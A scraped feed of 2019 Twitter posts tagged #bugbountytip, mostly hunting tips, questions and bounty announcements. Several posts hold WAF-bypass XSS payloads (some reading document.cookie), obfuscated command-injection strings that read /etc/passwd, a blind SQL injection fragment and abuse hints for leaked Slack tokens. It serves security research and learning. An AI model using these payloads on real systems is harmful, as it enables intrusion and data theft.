0 A lot of time people forget to look at the response or intercept the response in burp. Always examine the response in details especially when logging in. I was able to go from regular user to Admin by manipulating the response #bugbountytips #bugbountytip
Japz Divino
@japzdivino


2019-09-09 02:42:25
0 Reading hacktivity report will lead you to bounties by just bypassing the fix for the disclosed report.👌 #noobtip #bugbountytip https://t.co/ppnliULt5T
Hx01
@Hxzeroone


2019-09-08 05:35:30
1 #bugbountytip if the password reset link is shortened in email try checking for common hashes/encodings you may end up with gold mine, in the below scenario the url was shortened and the url id was sequential and encoded in base64 -->Scraping all generated password resets links. https://t.co/n11msD9iPP
x30r
@x30r_


2019-09-07 21:55:13
1 Into cyber security?? I don't know who votes what so lets have a poll! What suits you the most! #cybersecurity #bugbountytip #bugbounty #infosecurity #infoeec
Hussein Daher
@HusseiN98D


2019-09-07 19:40:04
7 Analysis of an RCE I found past week. RT and Like if you want more! If you got a bug bounty program, I'm open to any invite :) #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/VX6QATnRJH
An0nym0us
@MeetAn0nym0us


2019-09-07 17:54:13
1 #bugbountytip While testing a Laravel site try injecting different kinds of payloads or change Request methods to GET>POST or POST>GET. this will result in Laravel exception handler error Disclosing AWS, Database, and SMTP Credentials. https://t.co/jTnU3rf28y
Zeinab Raadsato
@ZRaadsato


2019-09-07 17:21:09
0 All courses are available: Burp Suite, Ethical Hacking, Networking, Secure Coding Free for limited time. #bugbountytip #BugBounty https://t.co/fZCGs25uF0
Jenish
@_jensec


2019-09-07 09:34:14
0 Yay, I was awarded a $1,050 bounty on @Hacker0x01 for bypassing 2FA via old API version’s login page! https://t.co/YGr8yp0IKy #TogetherWeHitHarder #bugbountytip
Osama Avvan
@osamaavvan


2019-09-07 08:22:00
2 My Writeup about Exploiting JSONP and Bypassing Referer Check. #bugbountytip #bugbountytips #Security https://t.co/Ewt9p3qPSe
Muzammil Kayani 🇵🇰
@muzammilabbas2


2019-09-06 15:26:35
0 #bugbountytip:Access the site without logging into account you will get some hidden endpoints which are overlooked by others.
Tinu rockk
@TinuRock007


2019-09-06 11:14:47
0 https://t.co/kCnDw5TEZu Open redirect to xss (2019) @BugBountyPOC #bugbountytips #BugBountyPOC #BugBounty #security #bugbountytip #bugbountytips #xss https://t.co/KTAOhiR0I7
C1h2e1
@C1h2e11


2019-09-06 10:05:40
1 #bugbounty #Bugbountytip Yesterday's problem was solved, forgetting to modify the Content-length but result is duplicated . So sad
Shamem Ahmad
@blkryd


2019-09-06 09:13:48
0 Finding webshells in a linux server. find . -name "*.php" | xargs grep -E 'webshell|' #Bugbountytip #hacktolearn
Shamem Ahmad
@blkryd


2019-09-06 08:50:54
1 A plus sign (+) A simple URL encoded space (%20) A null byte (%00) A newline (%0a) A tab (%09) A carriage return (%0d) #Bugbountytip
OSRC
@OsrcSecurity


2019-09-06 07:59:10
0 We are updating the official website now, but always welcome all the hackers chasing the bug bounty of OSRC, any issue or question about the programs, just leave your messages or to our emailbox [email protected] #Hackers #Bugbountytip
Leonel Emiliano
@leoalgare


2019-09-06 05:02:35
0 Hey guys, is there any way to perform a bypass of CSRF if i need to set an specific XSRF-TOKEN in order to exploit the issue ? I wasn't able to use XHR because of CORS policy. Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: * #bugbountytips #bugbountytip
Shubham Sharma
@Shubham_pen


2019-09-06 03:13:23
7 Today you will learn WordPress penetration testing using WPScan and Metasploit. @rajchandel @metasploit @ubuntu @kalilinux @wordpressdotcom @github #infosec #cybersecurity #bugbountytip #bugbounty #Pentesting #GodMorningFriday #CyberAttack #oscp #blackhat https://t.co/KT2wD17IVG
ak1t4 🇦🇷
@akita_zen


2019-09-06 02:02:10
9 #Bugbountytip: forget the subdomains for recon! go directly for the ASN & hit the network-range organization: A new world arises without waf’s, a lot of messy SSL certs, unprotected hosts & private hidden scopes! #bugbounty #infosec #thinkOutsideTheBox
C1h2e1
@C1h2e11


2019-09-05 17:05:24
1 #bugbounty #BugBountyTip I found an HTTP Request Smuggling and looked for the endpoint that echoed the request. In this endpoint, I tried to enter the long data successfully, but I ended up testing only a few characters of the request I don't know why this is😂
Ammar Amer🇸🇾
@cry__pto


2019-09-05 14:17:38
1 -“An XSS on Facebook via PNGs & Wonky Content Types”: https://t.co/K7uiWoQtZ8 -shopifyapps XSS on sales channels via currency formatting: https://t.co/wu6SZ1DcxE -UNITED AIRLINES XSS: https://t.co/kRbaMJTXlN -GOOGLE TAG MANAGER STORED XSS: https://t.co/PBAj81OEE1 #BugBountyTip
Proxy
@LinuxKodachi


2019-09-05 13:49:35
0 Here is a website that archive bug bounty tips. 👉https://t.co/hG46WtG0dd Check it out, it has other useful resources too. 😀 #bugbounty #BugBountyTip #bugbountytips @Hacker0x01
emir c a
@emirca_


2019-09-05 10:13:07
0 Got the 500 error with single quote but can’t find the SQLi parameter for it... But 500 error can lead to SQLi right? #BugBounty #bugbountytip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-05 05:59:42
0 CloudFlare {WAF} "R-XSS" Bypass; 🛡 ~ <isindex action="javas&tab;cript:alert(1)" type=image> ~ #BugBounty #BugBountyTip #WAF #infosec
David Schütz
@xdavidhu


2019-09-04 17:08:11
2 #bugbountytip - If your target requires phone number verification and you need more accounts, you can just buy a really cheap prepaid SIM card, and without topping it up, you can receive the verification codes in SMS! ⚡ (even better if you have a dual-sim phone) https://t.co/oUDJKIik3X
Mourad
@SecuAudit


2019-09-04 16:25:54
0 How do you deal with your hosting server provider for large Port Scanning complaints ? #bugbounty #bugbountytip #pentesting #hackerone https://t.co/pn9Zzmxuaa
sudoka
@sudo_sudoka


2019-09-04 16:10:23
0 Does anyone have experience with @InternetNZ bugbounty program? #bugbounty #bugbountytip
intigriti
@intigriti


2019-09-04 12:27:00
6 Did you know you can extract the AWS S3 bucket name from an object URL by appending these parameters? 🕵️ Thanks for the #BugBountyTip, @neeraj_sonaniya! #HackWithIntigriti https://t.co/cfVpRpOw1s
Hackers Academy
@Hackers_Academy


2019-09-04 10:40:17
0 98 Days Left! Introducing the 2nd training... @banyrock will take you on a 4 days journey of fully practical web hacking & bug hunting training. Be ready to learn some advanced techniques! #bugbountytip #Pentesting #infosec https://t.co/ixzLERf8Io https://t.co/9B4tg5DSvF
Rémy Marot
@R_Marot


2019-09-03 21:13:30
0 Quick #bugbountytip : if you are testing a symfony application, do not forget to check both app_dev.php and app_test.php controllers for debug information and sometimes sensitive information disclosure
Julien Ahrens
@MrTuxracer


2019-09-03 18:36:57
0 Plaintext password disclosure leading to admin access on a development environment. That just made my day. Remember: Always dig into JS files. They're a gold mine of stuff! #BugBounty #BugBountyTip
Dhamu
@Dhamuharker


2019-09-03 15:02:54
1 #bugbountytips The AWS Cloud Post Exploitation framework! POC https://t.co/nmhvNDdIRU #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder
abdoul gadiri balde
@moodiAbdoul


2019-09-03 12:17:38
2 #bugbountytip you can also use https://t.co/SI3CMaQq42 during recon , just search your target website or app to know how it work in short of time #infosec #bugbounty
Un4gi
@Un4gi1


2019-09-03 08:50:20
0 #bugbountytip If you don’t have enough room for typical XSS, try <base href=//url.co>. This will make every link on the same page redirect to the URL referenced! 😃
Bob Nicolson
@NicolsonBray


2019-09-03 08:01:00
0 Google throws bug bounty bucks at mega-popular third-party apps https://t.co/ZSu5DHaLjf #BugBounty #bugbountytip #google #Apps #cybersec #infosec #Hackers https://t.co/UzhkCYOmww
Meelo
@CaptMeelo


2019-09-02 12:21:41
1 Just published another post that might be useful during #bugbounty or #recon sessions. #bugbountytip https://t.co/NTTaI2KqHE
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-09-02 06:43:33
6 ModSecurity { XSS } Detection Bypass; { 1 }; <img src=x:alert(alt) onerror=eval(src) alt='spyerror'> { 2 }; "></tag><svg onload=alert(spyerror)> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-09-01 21:30:41
0 There is no csrf token when changing email. I'm creating csrf poc, and when I try to open poc.html with my other account, I get a "session expired" warning. What is the problem? How can I bypass it? #hackerone #bugcrowd #infosec #BugBounty #bugbountytip #csrf #intigriti
%00Termi
@Elhan65805947


2019-09-01 12:36:25
0 https://t.co/xNc07m02x7 >> campanyname.tld Paste >> https://t.co/NLo3oX2Loz Sometimes you may find upcoming project details, link to invite private meetings, other stuff. Keep on checking regularly. #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-09-01 12:30:19
1 It is not difficult to bypass #XSS filters. Remember that a firewall is a stupid device, just edit a simple part of the payload. You can use encoding, tag modifiers, and a lot of other ways like adding some unfamiliar characters or symbols to the payload. #bugbountytip
ak1t4 🇦🇷
@akita_zen


2019-09-01 01:43:09
7 #Bugbountytip: take your time to learn bash, curl & python 🐍 basic scripting. With only a few lines of those you can break anything! Automate your scripts & get the best PoCs #bugbounty #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-31 17:22:20
0 How can I redirect xhr login page? If I capture request with burp, web page redirecting other web page. But I can't do it with url? Any idea? #hackerone #bugcrowd #bugbountytip #infosec #redirect #vulnerability
Security Chops
@securitychops


2019-08-31 15:05:31
0 /dev/random - One Liner For Installing Burp Certificate Into Android Nougat and Later #burp #android #BugBounty #bugbountytip https://t.co/BtVxMMy6Jb
sudoka
@sudo_sudoka


2019-08-31 12:17:54
1 CSP can support you to make a #clickjacking possible even when X-Frame-Options: DENY. #bugbounty #bugbountytip https://t.co/AQf5mQk84W
Proxy
@LinuxKodachi


2019-08-31 06:57:10
0 Here is a google dork to find discord servers. 👉 https://t.co/bmVpQAaOgy "keyword" #bugbountytip #OpenSource #osint #Discord
Elhan
@Elhan65805947


2019-08-30 20:09:48
0 A single little dork can give admin access. Site:https://t.co/AUzqSGF92I companyname.tld Bookmark else keep interesting tabs hanging. >> win! #BugBounty #bugbountytip
Mourad
@SecuAudit


2019-08-30 17:30:33
0 I just lost 3000$USD in 2 days trading Forex , definitively Bug Bounty is more profitable and less risky than trading😰 #BugBounty #bugbountytip
Jenish Sojitra
@_jensec


2019-08-30 16:58:57
0 Yay, I was awarded a $1,200 bounty on @Hacker0x01 for tricky privilege escalation ! “ If API endpoint /api/path/ep throwing 401 try to go with /api/path/ep.json “ and it will fetch out json data without checking access control ! #bugbountytip
sagar yadav
@sagaryadav8742


2019-08-30 16:32:42
0 Hotstar swag 😊 Happy to #secure #hotstar #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #bounty #sagaryadav8742 https://t.co/iAgSxeRFre
Cyberthereaper
@Cyberthereaper3


2019-08-30 16:31:00
0 Is have dork for out of band all injection method? #hackerone #bugcrowd #infosec #bugbountytip
intigriti
@intigriti


2019-08-30 14:19:13
2 Thanks for the #BugBountyTip, @securinti! #HackWithIntigriti (P.S.: You are now banned from our live webinars) 👀🚫 https://t.co/z8Cz3rAUgS
sagar yadav
@sagaryadav8742


2019-08-30 13:37:17
0 #redstorm swag #reward and #hof Happy to #secure #redstorm 😊 #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter https://t.co/azpBgqAn21
3P1C
@_3P1C


2019-08-30 13:27:03
0 Bypass for SSRF filter Find a subdomain of your target (whitelisted) that resolves to an internal IP Like this internal[.]target[.]com --> 127.0.0.1 #bugbountytips #bugbountytip @intigriti @Bugcrowd @Hacker0x01
Fisher
@Regala_


2019-08-30 09:42:22
2 Yes!! Burp Scope Monitor just reached its 100th⭐️!! 🥳🥳 If you haven't used it yet, have a look at https://t.co/2zzgrNvj3G. Currently I'm especially looking for bugs/improvements suggestions so I can work on them later. #bugbounty #bugbountytip #infosec #pentest
Fady Othman
@Fady_Othman


2019-08-30 05:37:29
1 Do you think recording video tutorials using a 21:9 format (Wide Screen) is a good idea? #bugbounty #bugbountytips #bugbountytip
The_unstable
@chaskar_shubham


2019-08-29 13:03:23
0 I rewrote Recce from scratch! It is now faster than the previous version. It can now detect the server. You can write output to a csv file. https://t.co/CGFQHNaA64 check out! #bugbountytips #bugbountytip #bugbounty #InformationSecurity #infosec #infosecurity #hackerone #bugcrowd
Jagannath
@SecurityBoy0x01


2019-08-29 09:56:59
0 [Protip] Passwords using leetspeak are much safer than normal passwords against bruteforce-attacks with word-lists. E.g '53CURI7Y' is much more secure than 'Security', when combined with password managers. #bugbountytip #Password #hacking
Cyberthereaper
@Cyberthereaper3


2019-08-28 22:59:14
0 The biggest obstacles that will prevent you in bug bounty programs. Ruby web page Json content-type Akamaighost Cloudfront Cloudflare #BugBounty #hackerone #bugcrowd #intigriti #infosec #bugbountytip
Julien Ahrens
@MrTuxracer


2019-08-28 18:23:55
1 I recently got a maximum bounty for: Reflected XSS -> Grabbed user's identity token (no auth) -> Found auth logic error that converted the token w/o the user's pwd into an auth token -> ATO & 2FA Bypass. Always maximize your impact! #togetherwehitharder #bugbountytip #BugBounty
Yadhavi
@PrincessYadhavi


2019-08-28 16:42:39
0 How much rate you will use to get best results from masscan? (1024 hosts, 5$ digitalocean vps) #bugbounty #bugbountyhelp #bugbountytip #bugbountytips #masscan
Random Robbie
@Random_Robbie


2019-08-28 10:32:27
3 #bugbountytip BUGROBBIE for discount on @binaryedgeio
Cache Bounty @127.0.0.1
@Cache_Bounty


2019-08-28 09:06:40
1 Old but very useful: https://t.co/j1GHbfHNsc #security #bugbountytip #bugbountytips
Michael Eder
@michael_eder_


2019-08-28 08:33:10
1 Authenticated dirbusting 1) Log in w/ Firefox>DevTools>Network>reload page 2) Right click request, "copy curl" 3) rustbuster <your regular rustbuster options> <all -H parameters of the curl command> 4) Profit #infosec #bugbountytip #pentest
kaustubh padwad
@s3curityb3ast


2019-08-28 08:13:39
1 Ever Happen'd this @Hacker0x01 with known guys.. @sagarparmar121 @niksthehacker @stokfredrik @fransrosen @emgeekboy @Parth_Malhotra #bugbountytip #bugbounty @gwendallecoguic #hackerone #bugcrowd @SynackRedTeam is exception for this sharp 24Hrs payout.. ;) Just for Fun #bontyfun https://t.co/wyuV36SLWt
Nihad
@nihad_rekany


2019-08-28 08:09:48
0 Feeling love 🥰🥰 @fbsecurity #bugbountytip #bug https://t.co/Pc9V8CSJuu
Nihad
@nihad_rekany


2019-08-28 08:08:24
0 Thank you @fbsecurity 🥰🥰🥰 #bugbountytip https://t.co/jnggbyDNx8
Neeraj Edwards
@neeraj_sonaniya


2019-08-28 05:29:04
2 Revealing AWS S3 bucket name: step 1: Find any CDN object URL step 2: append following string to after URL: `?AWSAccessKeyId=[Valid_ACCESS_KEY_ID]&Expires=1766972005&Signature=ccc ` and boom it will reveal the bucket name. #BugBounty #security #bugbountytip #bugbountytips https://t.co/JWqGuZLHW4
Ahmed Lekssays
@Lekssays


2019-08-27 22:51:16
0 I made a tool to Extract Open Kibana Instances on Internet and Map them to their Corresponding Organizations using SSL certificates for Bug Bounty Programs. You can check it out: https://t.co/IQQIKdaAaC Happy hunting ;) #bugbounty #bugbountytip
Radek
@radekk


2019-08-27 19:45:52
1 Read how to use Burp Suite with multiple Firefox profiles - https://t.co/xqRPeT8NfC #bugbountytip #bugbounty
Aussan 🇨🇦
@aussan_m


2019-08-27 18:15:36
1 #bugbounty #bugbountytip When you get a bounty try to remember that there are people in need out there...try to give to charities, ... helping companies become secure is great, but helping others is even better.... remember what goes around comes around....
kaustubh padwad
@s3curityb3ast


2019-08-27 16:31:02
0 If you could ever build such complex query and if it returned 404 in "boolean based blind sql injection" AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x21) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x70686f746f73. what will be your reaction... #bugbountytip #ctf
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-27 00:31:48
3 CloudFlare {"HTML TO XSS"}; ~byPass Detected. 📡 [" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-26 23:48:19
0 CloudFlare {"XSS"}; ~byPass Detected. 📡 <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> #BugBounty #BugBountyTip #WAF #infosec
Cyberthereaper
@Cyberthereaper3


2019-08-26 21:52:05
0 I think one of the pages you hate to open the xss alert box is that it uses the ruby software language. #bugbounty #bugbountytip #hackerone #bugcrowd #infosec #redteam #xss #hacking
Murdockz
@Murdockz_CEH


2019-08-26 17:36:42
0 Created my first "Real" python script that decodes any base64 string...I think lol. Don't judge me it's my first time learning python lol. Check it out. #bugbountytip #bugbountytips #bugbounty https://t.co/rSnsf6BoBb
kaustubh padwad
@s3curityb3ast


2019-08-26 17:19:32
0 This is how I learn SQL Injection Now a days... #rofl #ctf #SQL #injection #bugbountytip #wireshark #hackerone #AppSec but I can imagine how tough is this to exploit, since sqlmap is taking too much time now its 2+ Hours with --dump-all... :) https://t.co/t1G0qtaNQh
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-26 16:50:20
0 Regexp trying detect Open redirect in response for burp #bugbountytips #bugbountytip https://t.co/LTbegfJf77
Murdockz
@Murdockz_CEH


2019-08-26 09:48:23
1 My first bug crowd P1. API Keys, Firebase Tokens, Account username and password. Recon wins. #BugBounty #bugbountytip #bugbountytip https://t.co/K6C0mnajQH
Hussein Daher
@HusseiN98D


2019-08-25 14:31:51
10 As per the vote results, here you go! A cool XXE resulting from a SSRF found on local company website during a pentest. DMs are open, retweet and like if you love this style of PoC! 😎 #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/XbwBLdYO33
gautam bhatia
@gautambhatia57


2019-08-25 11:14:23
0 Thanks a lot @defcon @DCG91135 @Bugcrowd @lab401 @infosecgirls @hackthebox_eu @PortSwigger for amazing workshop at DIT University #infosec #security #reversing #bugbountytip #rfid https://t.co/wqtmwLM4y9
Arif Khan
@payloadartist


2019-08-24 14:17:36
2 Another awesome research by a god of websec @filedescriptor: The Cookie monster in your browsers https://t.co/x051kiyWgJ #BugBounty #BugBountyTip
Hussein Daher
@HusseiN98D


2019-08-24 13:52:55
1 My next #bugbountytip PoC (check my Twitter for a preview of the old ones) should talk about: #bugbounty
Yogendra Jaiswal
@vulnh0lic


2019-08-24 13:28:31
17 Just Published article of [iOS Application Security] Jailbreak 12.4 and SSL pinning bypass | How to set up your iOS Testing Lab https://t.co/kVAs20V8dC #infosec #bugbountytip #sslbypass #jailbreak #iOS124 #unc0ver Thanks, @prateek_0490 and @Yassineaboukir @jpjaypatel34
Andri Wahyudi 🕊️
@andripwn


2019-08-24 11:25:33
1 Time US : 10:00 Time ID : 21:00 Bug Bounty Live! basic #recon , VulnerabilityAnalysis #shodan Live at : https://t.co/QdsrDoweOQ Follow Live streams and share... #BugBounty #bugbountytips #bugbountytip #hackerone #bugcrowd
Raihan Biswas 🇨🇮
@zapstiko


2019-08-24 05:01:29
3 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Vitthal Shinde
@0_1VitthalS


2019-08-24 04:11:48
1 If you found a hardcoded slack token, you can use it to get invitation to slack group. https://t.co/OMxs8QFVjQ<slack_token>&channel=CL0KQ4SK1&user=<email>&pretty=1 #BugBountyTip
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-23 06:41:14
1 Sucuri {` XSS ´}; payloads `appeared fresh, confirmed.´ ↭ Active </1>; "><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")> Active </2>; <;br size=\";&;{alert('XSS')}\";>; #BugBounty #BugBountyTip #WAF #infosec
Uranium238
@uraniumhacker


2019-08-22 18:02:56
1 Have your tools exporting stuff as JSON? use Panda to export it as a .db file. You can then use client side js to parse the db and query through it. #bugbountytip
contra_security
@security_contra


2019-08-22 17:46:16
0 Analysis of Ruby rest-client 1.6.13 backdoor https://t.co/KGSXYpw68B @snyksec #owasp #backdoor #ruby #appsec #bugbountytip
m0z
@LooseSecurity


2019-08-22 16:47:55
6 file.php?url=/admin/ Redirects to: https://t.co/xsJrSUcfgM Put URL [email protected] Now it is [email protected] which redirects to https://t.co/ptXaIXLfKk! #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity
Prateek Tiwari
@prateek_0490


2019-08-22 15:47:03
4 Really shocking to see how companies leave their log instances exposed to public. I'm referring to #Kibana, since last few weeks have found a lot of them, reported to companies who have BBP's. Dork - inurl:app/kibana Shodan - title:"kibana" port:"443" #bugbountytip #bugbounty
sudoka
@sudo_sudoka


2019-08-22 10:57:15
0 I've seen some websites block exactly the string "alert(something)" #xss #bypass #bugbountytip https://t.co/MKOSMHdKcA
Dhamu
@Dhamuharker


2019-08-22 09:11:57
2 #bugbountytips #BugBounty Finally Got it Root Access. Thanks for @orange_8361 @ProjectZeroIN the exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510) https://t.co/k1Qk45QnCq #bugbountytip #ItTakesACrowd #TogetherWeHitHarder https://t.co/lwJi2ss068
Anton Korzhynskyi
@page_1337


2019-08-21 21:42:14
0 My turn :) Cloudflare #XSS #Bypass <img src onerror=%26emsp;prompt`${document.domain}`> #WAF #BugBounty #BugBountyTip https://t.co/UxkKOfkioC
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-21 19:54:51
1 ModSecurity {" XSS "} ~Bypass braindeath; ⓾ ~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass " ~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E" #BugBounty #BugBountyTip #WAF #infosec
CaptainFreak
@0xCaptainFreak


2019-08-21 12:09:46
0 On Rails target, many people don't try XSS tests by knowing that Rails by default doesn't reflect without escape/encode. But "security conscious" devs mistake the "html_safe" method of rails for escaping while it does the exact reverse thing. Hence, XSS lives on. #bugbountytip
Abugzlife
@abugzlife1


2019-08-21 01:39:35
5 Have you ever thought to yourself: “You know what, I’m really curious what the methodology for finding bugs that an average bug hunter who focuses on depth rather than breadth looks like!” Well, now is your chance to see! https://t.co/ih8hwmaIP6 #bugbountytip #bugbounty
plenum 🇹🇳
@plenumlab


2019-08-20 23:21:47
1 To those who struggle to get into bb I barely knew what http requests look like, 14 duplicates and 4 N/A before my first valid report, don't quit, every minute, every inspected http request is experience #bugbountytips #bugbountytip
Ammar Amer
@cry__pto


2019-08-20 23:15:45
1 I think you should visit my repository, you may find something useful about hacking & pentesting & cybersecurity & redteam & malware. Almost 2000 links & almost 1000 articles as pdf files. Enjoy and #happy_hacking https://t.co/q2layzVpKz #sharingiscaring #bugbountytip #OSINT https://t.co/DWQFvHpWuN
Andri Wahyudi 🕊️
@andripwn


2019-08-20 19:03:48
0 yay I found Jira Dashboard at @Hacker0x01 #DOD Exploiting Jira Dashboard Leads to (RCE) This report waiting a Disclosed / Fixed and waiting for #writeups #BugBounty #bugbountytip #rce #jira_rce https://t.co/T0M5Zr8q2B
Rishabh
@____cypher____


2019-08-20 18:35:23
0 Did you know you can "edit and resend" requests without any interceptor in Mozilla firefox #bugbountytip #BugBounty https://t.co/FrtUB2KUO8
Raihan Biswas 🇨🇮
@zapstiko


2019-08-20 15:08:22
4 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Faizal Abroni
@faizalabroni


2019-08-20 13:58:44
0 AWS Metadata Disclosure via hardcoded host download (Indonesian language) https://t.co/lkxDPZ8VN8 #bugbounty #bugbountytip #bugbountytips #togetherwehit #ittakesacrowd
C1h2e1
@C1h2e11


2019-08-20 13:34:45
2 A tips from Nahamsec @NahamSec curl -X GET https://t.co/pIuaaFEPZL{organization} https://t.co/5XaiHYznhj{organization} https://t.co/7AlvIjzWht{IP address} Shodan search query ASN:{ASN} #bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-20 13:08:57
3 {XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// #BugBounty #BugBountyTip #WAF #infosec
Securisec 🚀
@securisec


2019-08-20 11:34:28
0 "RT RT Regala_: Here it is! Burp Scope Monitor, a simple Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/EFXtxmOLEE #bugbounty #bugbountytip 🥳🥳😇"
Cyberthereaper
@Cyberthereaper3


2019-08-20 10:54:47
0 sometimes we cannot find vulnerabilities due to a web browser problem. #hackerone #bugcrowd #infosec #bugbounty #bugbountytip #blackhat #defcon #redteam #LFI #RFI #hacking #chrome #firefox #recon #osint example : https://t.co/D0RK0uDcB2
Sergey Kashatov
@iframe0x01


2019-08-20 10:25:10
1 #hackerone #bugbounty #bugbountytip I just published How I upgraded my privileges to the administrator of Odnoklassniki’s url shortener https://t.co/yBKYctUp0a
Fisher
@Regala_


2019-08-20 09:20:01
14 Here it is! Burp Scope Monitor, a simple @Burp_Suite extension to help you keep track of unique endpoints in your history, marking them as analyzed, highlighting and other cool stuff! Check it out: https://t.co/2zzgrNvj3G #bugbounty #bugbountytip 🥳🥳😇
luffydragneel
@Hackers_Guild


2019-08-20 06:53:26
0 If there is a subscription for a pro account for suppose 1 year, always Intercept the Request and change the subscription period. In some cases, you will be able to increase the subscription to any no. of years leading to Business logic vuln. #bugbountytip @SynackRedTeam https://t.co/NLDXDbquzY
Osama Avvan
@osamaavvan


2019-08-19 18:07:09
1 My Writeup about Different Ways of Exploiting CSRF. https://t.co/yneogH4EYL #bugbountytip @bugbountypocs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-19 16:40:35
0 { WAF }; bypass post based xss ✨ ~Payload; <message><dialogueType>&e;</dialogueType></message> ~Result; WAF Allowed: 200 #BugBounty #BugBountyTip #WAF #infosec https://t.co/f28Yby7WZR
Soroush Dalili
@irsdl


2019-08-19 11:33:43
0 #BugBountyTip: To make your Burp Suite testing faster, change its colour to Red! With go faster stripes as suggested by @bao7uo
Proxy
@LinuxKodachi


2019-08-19 11:27:51
0 🛡 Honest advice, Sherlock! 🛡 #bugbountytip #mentor #entrepreneur #Developer #programming #programmers #startup https://t.co/0I8cofTS3X
ak1t4 🇦🇷
@akita_zen


2019-08-19 06:38:08
2 #Bugbountytip: avoid to define yourself for what you know or what you have or what you get ($$$). You are truly unique and your being can’t be defined by a temporal status. Enjoy bugbounty, play a little, bb needs to be fun :) #bugbounty #infosec #mentalhealth
Cyberthereaper
@Cyberthereaper3


2019-08-19 06:33:41
4 S3 bucket finder cat subdomain.txt | httprobe | tee hosts && meg -d 1000 -v / && grep -horiE [A-z0-9.-]+\.s3\.amazonaws\.com (You can change regex or you can add more regex with && ) @TomNomNom #hackerone #bugcrowd #recon #infosec #blackhat #bugbounty #bugbountytip #osint #s3
mr_nyx
@mr_nyxs


2019-08-18 19:11:24
1 Never give up! Payload URLENCODE(payload) URLENCODE(URLENCODE(payload)) URLENCODE(URLENCODE(URLENCODE(payload))) ... #BugBountyTip #BugBounty
HackIsOn ®
@hackison


2019-08-18 17:33:00
0 What will be your answer to the following question #infosec people? 🤔 How to #hack android phones using Link ? 😂 #hacking #pentesting #linux #bugbounty #bugbountytip #exploit #kalilinux #offsec #redteam #pentester #hackison #wapt #vapt
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 17:12:44
2 Hi babe again I'm, whats up fbi. I warned very , lest he remove the search button from there. 💣 Patch: https://t.co/NhIAxHWUUl #BugBounty #BugBountyTip #WAF #infosec https://t.co/azwQwX5nMh
YS
@YShahinzadeh


2019-08-18 16:45:08
0 JSONP call returning auth token -> acc takeover #bugbountytip
(((Gamliel)))
@Gamliel_InfoSec


2019-08-18 15:42:00
0 Don't expect different assets/endpoints if you are searching in the same subdomain. #bugbountytip #BugBounty #WebPentest #SearchSomethingElse
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 14:21:24
5 "Cloudflare"; live payloads: 🧠 ~1: <img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'> ~2: <img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//"" src="x" alt="showme"> #BugBounty #BugBountyTip #WAF
NetDevilz
@netdevilz


2019-08-18 13:03:14
0 Time may have forgotten everything, never date ... #netdevilz İCANN: https://t.co/FZafbc6qaj #bugbounty #webapp #bugbountytip #infosec #waf https://t.co/sYW3KKhdSo
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-18 08:43:13
1 Sucuri { RCE }; payloads, dot shot. 🌪️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </> #BugBounty #BugBountyTip #WAF #infosec
Str0k1rch
@str0k1rch


2019-08-18 08:32:02
